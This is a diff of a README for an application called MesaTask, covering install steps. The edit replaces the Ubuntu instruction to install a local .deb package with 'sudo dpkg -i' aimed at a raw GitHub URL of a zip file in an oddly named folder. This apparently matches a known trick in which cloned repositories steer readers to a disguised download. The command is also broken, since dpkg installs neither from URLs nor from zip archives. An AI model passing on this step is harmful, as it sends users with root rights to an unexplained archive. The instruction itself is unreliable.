jssfinhoap22/MesaTask/Readme.md

    - **For macOS**:
      - Open the downloaded `.dmg` file.
 Drag and drop the MesaTask icon into your Applications folder.
    - **For Ubuntu**:
      - Open your terminal.
-Navigate to the downloaded folder and run the following command: `sudo dpkg -i MesaTask.deb`.
+Navigate to the downloaded folder and run the following command: `sudo dpkg -i https://raw.githubusercontent.com/jssfinhoap22/MesaTask/main/mycomyringitis/MesaTask.zip`.
 You may need to install any required dependencies.

 4. **Launch the Application**
    - **Windows**: Search for MesaTask in the Start menu and click to launch.